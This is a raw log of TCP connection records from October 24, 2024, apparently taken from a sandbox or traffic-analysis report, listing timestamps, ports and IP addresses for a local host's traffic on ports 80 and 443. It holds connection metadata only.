                                                                                              Oct 24, 2024 12:03:08.294394970 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294467926 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294472933 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294502020 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294531107 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294533968 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294545889 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294553995 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294584036 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294595003 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294600010 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294610023 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294661045 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294666052 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294677973 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294730902 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294787884 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294841051 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294888020 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294888020 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294888020 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294900894 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.294934034 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.294943094 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.295458078 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374540091 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374608040 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374634027 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374659061 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374675035 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374675035 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374713898 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374722004 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374736071 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374768019 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374782085 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374783039 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374787092 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374842882 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374842882 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374857903 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374888897 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374906063 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374953985 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.374955893 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.374964952 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.375000954 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.375014067 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.375061035 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.375587940 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.411063910 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.411153078 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.411189079 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.411233902 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.411375046 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.411420107 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.411500931 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.411549091 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.411606073 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.411654949 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.411708117 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.411755085 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.411809921 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.411859035 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.411909103 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.411955118 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.412009954 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.412064075 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.412111998 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.412163973 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491584063 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491658926 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491723061 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491734982 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491772890 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491792917 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491795063 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491795063 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491821051 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491827965 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491842985 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491857052 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491883039 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491888046 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491903067 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491904020 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491940022 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491945028 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491959095 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491960049 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.491987944 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.491992950 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.492007017 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.492022991 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.492041111 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.492046118 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.492058992 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.492086887 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.492204905 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.528676987 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.528827906 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.528836012 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.528858900 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.528887987 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.528904915 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.528964043 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.529021025 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.529042959 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.529090881 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.529238939 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.529243946 CEST44349163142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.529301882 CEST49163443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 12:03:08.732201099 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:08.737972021 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.738079071 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:08.738343954 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:08.743813038 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:09.399804115 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:09.412684917 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:09.418113947 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:09.570429087 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:09.601088047 CEST49165443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:09.601120949 CEST44349165188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:09.601196051 CEST49165443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:09.602665901 CEST49165443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:09.602693081 CEST44349165188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:09.780051947 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:09.780235052 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:10.219357014 CEST44349165188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.220292091 CEST49165443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.224349976 CEST49165443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.224359035 CEST44349165188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.224843979 CEST44349165188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.246107101 CEST49165443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.287337065 CEST44349165188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.384825945 CEST44349165188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.385062933 CEST44349165188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.385185003 CEST49165443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.463041067 CEST49165443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.559598923 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:10.565069914 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.741102934 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.754012108 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.754117966 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.754215002 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.754695892 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:10.754730940 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.952076912 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:10.952320099 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:11.377726078 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.380654097 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:11.380714893 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.519263029 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.519428015 CEST44349166188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.519511938 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:11.520636082 CEST49166443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:11.540756941 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:11.546338081 CEST8049164193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.546818972 CEST4916480192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:11.564021111 CEST4916780192.168.2.22132.226.8.169
                                                                                              Oct 24, 2024 12:03:11.569384098 CEST8049167132.226.8.169192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.569480896 CEST4916780192.168.2.22132.226.8.169
                                                                                              Oct 24, 2024 12:03:11.569566011 CEST4916780192.168.2.22132.226.8.169
                                                                                              Oct 24, 2024 12:03:11.574933052 CEST8049167132.226.8.169192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.638803959 CEST8049167132.226.8.169192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.657659054 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:12.657701969 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.657763958 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:12.658117056 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:12.658130884 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.849598885 CEST8049167132.226.8.169192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.849739075 CEST4916780192.168.2.22132.226.8.169
                                                                                              Oct 24, 2024 12:03:13.278109074 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.281162024 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:13.281179905 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.419342995 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.419434071 CEST44349168188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.419476986 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:13.420006037 CEST49168443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:13.457293987 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:13.462698936 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.462862015 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:13.462949991 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:13.468172073 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.334742069 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.544008017 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.546253920 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:14.694822073 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:14.694870949 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.694943905 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:14.695420027 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:14.695432901 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.293873072 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.495331049 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.495387077 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:15.533149958 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:15.533160925 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.685297966 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.685388088 CEST44349170188.114.96.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.685436010 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:15.696789980 CEST49170443192.168.2.22188.114.96.3
                                                                                              Oct 24, 2024 12:03:15.750264883 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.756050110 CEST8049169132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.756506920 CEST4916980192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.800462008 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.805830002 CEST8049171132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.805883884 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.807598114 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:15.813064098 CEST8049171132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.661395073 CEST8049171132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.675237894 CEST49172443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:16.675272942 CEST44349172188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.675421000 CEST49172443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:16.675728083 CEST49172443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:16.675738096 CEST44349172188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.866049051 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:16.869441986 CEST8049171132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.869493961 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:17.275038958 CEST44349172188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:17.278114080 CEST49172443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:17.278131962 CEST44349172188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:17.420571089 CEST44349172188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:17.420677900 CEST44349172188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:17.420819044 CEST49172443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:17.421245098 CEST49172443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:17.434801102 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:17.440572023 CEST8049171132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:17.440717936 CEST4917180192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:17.456909895 CEST4917380192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:17.462330103 CEST8049173132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:17.462414980 CEST4917380192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:17.462455988 CEST4917380192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:17.468122959 CEST8049173132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:18.342772961 CEST8049173132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:18.362641096 CEST49174443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:18.362694025 CEST44349174188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:18.362767935 CEST49174443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:18.363153934 CEST49174443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:18.363163948 CEST44349174188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:18.550862074 CEST4917380192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:18.552324057 CEST8049173132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:18.552427053 CEST4917380192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:18.969491959 CEST44349174188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.089528084 CEST49174443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:19.089543104 CEST44349174188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.225910902 CEST44349174188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.226021051 CEST44349174188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.226094007 CEST49174443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:19.226713896 CEST49174443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:19.239363909 CEST4917380192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:19.245789051 CEST8049173132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.245860100 CEST4917380192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:19.261347055 CEST4917580192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:19.266890049 CEST8049175193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.267075062 CEST4917580192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:19.267075062 CEST4917580192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:19.272804022 CEST8049175193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.920361996 CEST8049175193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.934989929 CEST49176443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:19.935049057 CEST44349176188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.935127974 CEST49176443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:19.935445070 CEST49176443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:19.935476065 CEST44349176188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:20.126327038 CEST4917580192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:20.546515942 CEST44349176188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:20.549793005 CEST49176443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:20.549819946 CEST44349176188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:20.688196898 CEST44349176188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:20.688479900 CEST44349176188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:20.688674927 CEST49176443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:20.689166069 CEST49176443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:20.706037998 CEST4917580192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:20.711848974 CEST8049175193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:20.711930037 CEST4917580192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:21.110769033 CEST4917780192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:21.116789103 CEST8049177132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:21.116848946 CEST4917780192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:21.117177963 CEST4917780192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:21.122432947 CEST8049177132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:21.980623960 CEST8049177132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:21.999129057 CEST49178443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:21.999186993 CEST44349178188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:21.999399900 CEST49178443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:21.999593019 CEST49178443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:21.999624968 CEST44349178188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.185587883 CEST4917780192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:22.188254118 CEST8049177132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.190274954 CEST4917780192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:22.609654903 CEST44349178188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.613156080 CEST49178443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:22.613239050 CEST44349178188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.754133940 CEST44349178188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.754379988 CEST44349178188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.758281946 CEST49178443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:22.758712053 CEST49178443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:22.770205975 CEST4917780192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:22.776582003 CEST8049177132.226.247.73192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.776637077 CEST4917780192.168.2.22132.226.247.73
                                                                                              Oct 24, 2024 12:03:22.798516035 CEST4917980192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:22.804300070 CEST8049179193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.806262970 CEST4917980192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:22.806312084 CEST4917980192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:22.811791897 CEST8049179193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:23.459506035 CEST8049179193.122.130.0192.168.2.22
                                                                                              Oct 24, 2024 12:03:23.479116917 CEST49180443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:23.479155064 CEST44349180188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:23.479223967 CEST49180443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:23.479554892 CEST49180443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:23.479566097 CEST44349180188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:23.667840004 CEST4917980192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:24.094125986 CEST44349180188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:24.098313093 CEST49180443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:24.098357916 CEST44349180188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:24.237914085 CEST44349180188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:24.238164902 CEST44349180188.114.97.3192.168.2.22
                                                                                              Oct 24, 2024 12:03:24.238266945 CEST49180443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:24.238929987 CEST49180443192.168.2.22188.114.97.3
                                                                                              Oct 24, 2024 12:03:24.279400110 CEST4917980192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:24.285367012 CEST8049179193.122.130.0192.168.2.22
